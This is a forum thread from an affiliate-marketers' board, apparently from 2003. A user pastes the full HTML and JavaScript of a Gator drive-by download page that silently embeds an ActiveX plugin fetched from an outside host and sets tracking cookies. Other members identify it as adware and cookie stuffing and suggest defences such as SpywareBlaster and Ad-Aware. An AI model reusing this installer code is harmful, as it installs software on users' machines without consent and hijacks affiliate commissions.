Results 1 to 15 of 15
  1. #1
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    When I was surfing today I came to a website where a lot of pops appeared. When I finished to click them away ( in my Opera-browser) there rested a invisible website which I cannot see nor access. So I saved it to my desktop and viewed the source code by edit feature. The code was:


    .<html>
    <head>
    <title></title>
    .<script language="JavaScript">
    var pdppi_loaded = false;

    function sendPartnerEvent( ){
    var event_src = "";
    if( event_src ){
    document.partnerEventPixel.src = event_src;
    }
    }

    function sendPartnerImp(){
    var event_src = "";
    if( event_src ){
    var eventImg = new Image;
    eventImg.src = event_src;
    }
    }

    function changeEventPixelSrc( eventid, eventnum ){
    var event_src = "/uniq3/PwVE1sCo-sIAAEswczg" + eventnum + ".gif?yic=HIC_FortuneCity7&eventid=" + eventid + "&reason=0&wuid=PwVE1sCo-sIAAEswczg&ver=0";
    switch( eventnum ){
    case 2:
    document.eventPixel2.src = event_src;
    break;
    default:
    document.eventPixel1.src = event_src;
    }
    }

    function openNew( ){
    var pos_top = (screen.height/2)-(300/2);
    var pos_left = (screen.width/2)-(300/2);
    window.open( '','ncr','width=300,height=300,top=' + pos_top + ',left=' + pos_left );
    }

    function sleep_close( wait ){
    var jsTimer = wait * 1000;
    setTimeout("window.close();",jsTimer);
    return true;
    }

    function checkPlugin( ){
    var js_plugin_error = 0;
    var strObjType = typeof( IEGator );
    if( 'object' == strObjType ){
    var strParamsType = typeof( IEGator.params );
    if ( strParamsType != 'string' ){
    js_plugin_error += 1;
    }
    } else {
    if('undefined' == strObjType){
    js_plugin_error += 2;
    }
    else if( 'unknown' == strObjType ){
    js_plugin_error += 4;
    } else {
    js_plugin_error += 8;
    }
    }

    setCookie( "GatorWebPdpCookie_OfferedApps", ":1", 30 );
    setCookie( "GatorWebPdpCookie_WUID", "PwVE1sCo-sIAAEswczg", 3650 );
    setCookie( "GatorWebPdpCookie_PluginTimer", 1057311710, 3650 );
    setCookie( "GatorWebPdpCookie_VisitedPartners", "hic_fortunecity7:1", 30 );
    doHBPix();

    if( js_plugin_error == 0 || pdppi_loaded ){
    window.focus();
    setCookie( "GatorWebPdpCookie_ApprovedApps", "", 3650 );
    changeEventPixelSrc( 4011, 2 );
    sendPartnerEvent( );
    } else {
    changeEventPixelSrc( 4012, 2 );

    sleep_close( 30 );
    }
    sendPartnerImp();


    }

    function setCookie( name, value, days ){
    var expiry = 1000 * 60 * 60 * 24 * days;
    var expDate = new Date();
    expDate.setTime(expDate.getTime() + expiry);
    document.cookie = name + "=" + escape( value ) + "; expires=" + expDate.toGMTString() + "; path=/; domain=.gator.com";
    }

    function doHBPix(){
    var newHBpix = "";
    if( newHBpix ){
    document.hbpix.src = newHBpix;
    }
    return true;
    }

    function embedPlugin( ){
    document.writeln( "<object" );
    document.writeln( " id=\"IEGator\"" );
    document.writeln( " classid=\"CLSID:54e7e082-1da6-412e-96b5-c290fcef5329\"" );
    document.writeln( " codebase=\"http://webpdp.gator.com/v3/download/iegator_4090_hd3ptdmgainads.cab\"" );
    document.writeln( " align=\"baseline\"" );
    document.writeln( " border=\"0\"" );
    document.writeln( " width=\"2\"" );
    document.writeln( " height=\"2\">" );
    document.writeln( " <param name=\"params\" value=\"&fcn=hd&bgcolor=FFFFFF&ds=1&tkds=1&src=webpdp.gator.com/v3/download/trickler_4010.ex_&aic=HIC_FortuneCity7&pidel=this&email=&fname=&country=&zip=&wuid=PwVE1sCo-sIAAEswczg&rs=1&hdeulaurl=http://www.gatorcorporation.com/help/hd_postyes40/hd-post-yes40-p1f.html&did=0&apprq=\">" );
    document.writeln( " <img src=\"images/pixel.gif\" width=\"2\" height=\"2\" alt=\"[Plugin]\">" );
    document.writeln( "</object>" );
    }

    .</script>
    .<script language="JavaScript" for="IEGator" event="onPluginCreated()">
    pdppi_loaded = true;
    return 7;
    .</script>
    .</head>
    .<body bgcolor="#FFFFFF" onLoad="checkPlugin();" onUnload="">
    .<center>.<font>Please Wait ....</font>.</center>
    .<img src="images/pixel.gif" name="eventPixel1" height="1" width="1" alt="[pixel1]">
    .<img src="images/pixel.gif" name="eventPixel2" height="1" width="1" alt="[pixel2]">
    .<img src="images/pixel.gif" name="partnerEventPixel" height="1" width="1" alt="[pixel3]">
    .<img src="images/pixel.gif" name="hbpix" height="1" width="1" alt="[pixel4]">
    .<script language="JavaScript1.2">
    changeEventPixelSrc( 4001, 1 );
    embedPlugin();
    .</script>
    .</body>
    .</html>



    It tried to download a " precision and Date Manager, free 10 second Gain ad-supported that displays exact time and date and Gain-branded ads selected based on websites you view"


    does that mean that they steal me 10 seconds and, of course my cookie?


    carneol

  2. #2
    ABW Ambassador Andy's Avatar
    Join Date
    January 18th, 2005
    Posts
    4,178
    Welcome to the wonderful world of parasitic activity.

    You probably didn't realize it, but you wanted to download it, right? I mean, they would never try to take advantage of an unsuspecting computer user...

    I'm not an expert by any means, and I'm sure someone here can give you all the details you need, but that's how some of those software apps get downloaded, and it looks like yours may have been one of them. No request for permission, no chance to read the TOS.

    Of course, everyone WANTS them because they offer such value to the end user...

    It ought to be illegal!

    Andy

    P.S., Any positive comments made in this post were meant to be sarcastic.

    _______________
    "If you were born to be shot, you'll never be hung." -Unknown

  3. #3
    Defender of Truth, Justice and the Affiliate Way
    Join Date
    January 18th, 2005
    Location
    The Swamp
    Posts
    7,503
    Looks like a download for the gator trickler program. The trickler, once downloaded, will download the full gator software over time. And yes, this is a drive by download.

    It's Your Money. You earned it. What are you going to do to make sure you get to keep it?

  4. #4
    Super Sh!t Stirrer SSanf's Avatar
    Join Date
    January 18th, 2005
    Posts
    9,944
    What the heck! I just searched for "gator" on my computer and I found a cookie that says this
    <BLOCKQUOTE class="ip-ubbcode-quote"><font size="-1">quote:</font><HR> GatorWebPdpCookie_WUID
    Pvh6pgr3CA8AAHbdPqU
    gator.com/
    0
    1830886912
    30305953
    3048811392
    29571698
    *
    GatorWebPdpCookie_MSG
    86%3A3%3A1%3A3ef87aa6%7C87%3A3%3A1%3A3ef884b7
    gator.com/
    0
    2897548672
    29583768
    1999211392
    29571698
    *
    GatorWebPdpCookie_PLCMNT
    78%3A44%3A2%3A3ef884b7
    gator.com/
    0
    2897548672
    29583768
    1999211392
    29571698
    *
    GatorWebPdpCookie_OfferedApps
    %3A2
    gator.com/
    0
    2915180032
    29577733
    3048811392
    29571698
    *
    GatorWebPdpCookie_PluginTimer
    1056476193
    gator.com/
    0
    1830886912
    30305953
    3048811392
    29571698
    *
    GatorWebPdpCookie_VisitedPartners
    hic_fortunecityus%3A1%7Chic_fortunecity10%3A1
    gator.com/
    0
    2915180032
    29577733
    3048811392
    29571698
    *
    <HR></BLOCKQUOTE>

    I have never downloaded Gator. Do I have it on my computer, now?

    The Wolf Credo: Respect the elders. Teach the young. Cooperate with the pack. Play when you can. Hunt when you must. Rest in between. Share your affections. Voice your feelings. Leave your mark.

  5. #5
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    Ssanf, seems that you have a drive by download on your PC, and also the plugin timer I found above. What scares me is that:"

    free 10 second Gain".

    What does that mean? Do they change the PC clock for 10 sec. and therefore my cookie which is set is 10 sec. older than theirs?


    carneol

  6. #6
    2005 Linkshare Golden Link Award Winner  ecomcity's Avatar
    Join Date
    January 18th, 2005
    Location
    St Clair Shores MI.
    Posts
    17,328
    Once Gator or any BHO gets their backdoor installed and complete access to your PC they can turn loose their commission tapeworm. Gator has about 600 participating merchants. Cookie overwrite time or planting theirs with a 10 second head start. What the networks are hiding is these growth of these BHO as they sute know the BHO syndication players.

    Next up gator installs a new batch of 600 active cookies daily on all their 30 million captives. Many not even knowing Gator is there. Wanna bet Gator is working on cutting into the other BHO's revenue scheme. The battle of the theftware Bots is underway leaving behind normal value add affiliates and carcuses of PCs that just don't work anymore.

    At least they all have screwed over their merchants plans at branding and free traffic.....ROLMAO

    Mike & Charlie ...

    If they won't adopt and feed a bird ..flip them one! BBQ some Gator and remember to flush WhenU..

  7. #7
    ABW Ambassador
    Join Date
    January 18th, 2005
    Location
    Sacramento, CA
    Posts
    1,263
    now, the question is, what can we do with the information posted above, be it notifying the visitor that they have it installed, or actually reversing the process? Would parasite.js catch this?

    FreeCallz.com

  8. #8
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    I asked what to do in a special javascript webdeveloper forum and got the answer:

    For IE:
    Tools
    Internet Options...
    Security
    Custom Level...
    Then set to "Prompt" anything that you don't want done automatically.


    Clientside javascripts work on 95% of all visitors.



    carneol

  9. #9
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    668
    This happened to me a week or so ago, but with Ncase, it was hell getting all the crap off my puter and everything back to normal again!

    It started with the drive by download of Ncase - which in order to uninstall you have to go to their site and download the uninstaller, then within 24 hours I had kazaa/whenu/gator all kinds of crap and a zillion popups, and alot of them xxx rated crap, it was a major PITA!!

    It's more fun to jump on the trampoline than sit underneath it!

  10. #10
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    I got another reply from that js forum:


    "You could get a free program called SpywareBlaster. I think it's from .http://wilderssecurity.com/ .
    It sets what is known as a 'kill-bit' for all known spyware, preventing it from running. In this case, I think the website was trying to download Gator to your computer. With the Gator kill-bit set, it wouldn't install. If it's already installed before you set up SpywareBlaster, then it couldn't run after you set the kill-bit.
    WildersSecurity also has several other free programs that are great for increasing the security of your computer."


    Don't know what it is. Has anybody experience with that "killerbit"?


    carneol



    P.S.: I found that Information and it looks very good:


    "SpywareBlaster:

    SpywareBlaster doesn't scan and clean for spyware - it prevents it from ever being installed.
    By setting a "kill bit" for spyware ActiveX controls, SpywareBlaster can prevent the installation of any spyware ActiveX controls from a webpage. It does this while not interfering with "friendly" ActiveX controls - so your browser can work correctly and you can have peace of mind!
    You won't get any more annoying "Yes/No" boxes popped up, asking you to install a spyware ActiveX control (which can increasingly be found in pop-up ads!). In fact, Internet Explorer will never even download or run the spyware ActiveX control!
    In addition, SpywareBlaster can prevent many of these spyware ActiveX controls from running, even if they are already installed on your system.*
    The newest SpywareBlaster version can even block spyware/tracking cookies!
    And SpywareBlaster does not need to be running in the background to provide this protection!
    The SpywareBlaster database contains information on these known spyware Active-X controls. Make sure you run the Check For Updates feature frequently to get the latest database! (And make sure you check the new items to protect your system against them!)
    SpywareBlaster also provides the exclusive System Snapshot! - Take a snapshot of your computer in its clean state, and use System Snapshot later to revert many changes made by spyware and browser hijackers!"

    [This message was edited by carneol on July 05, 2003 at 05:51 PM.]

  11. #11
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    4,423
    SSanf, now that you have that stuff on your pc - don't you feel empowered?

    Chet

  12. #12
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    I can not recommend spywareblaster, because it blocks all cookies and rates everything as spyware which comes from the web.


    carneol

  13. #13
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,082
    <BLOCKQUOTE class="ip-ubbcode-quote"><font size="-1">quote:</font><HR> For IE:
    Tools
    Internet Options...
    Security
    Custom Level...
    Then set to "Prompt" anything that you don't want done automatically.
    <HR></BLOCKQUOTE>
    Which ones should we set to prompt? I set them all to prompt and it is getting annoying. Any suggestions are welcome.
    Cazzie

    Join the Fight! Parasite Free In 2003!

  14. #14
    Full Member
    Join Date
    January 18th, 2005
    Posts
    379
    spybot and ad-aware have become a regular routine for me for the past 6 months.

    In case you haven't heard of these they remove scumware from the PC. It's amazing what get's picked up while surfing.

  15. #15
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    if you are a customer and you run a bot, then the cookies from e.g. cj.com are deleted and the publisher from which the cookie was set doesn't get commission when you sell s.th. from this merchant.


    carneol

  16. Newsletter Signup

+ Reply to Thread

Similar Threads

  1. EPC Download Feature - in Transaction Download Reports
    By GoColts in forum eBay Partner Network
    Replies: 1
    Last Post: April 18th, 2011, 10:11 PM
  2. Drive By Hello
    By Uncle Rico in forum Virtual Family and Off-Topic
    Replies: 3
    Last Post: March 11th, 2008, 02:10 PM
  3. That's it. They're going to drive me MAD!!!
    By Rhea in forum Dieting, Fitness & Health
    Replies: 8
    Last Post: January 2nd, 2008, 07:50 PM
  4. This is my drive by spam!
    By SSanf in forum Midnight Cafe'
    Replies: 12
    Last Post: May 13th, 2002, 08:38 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •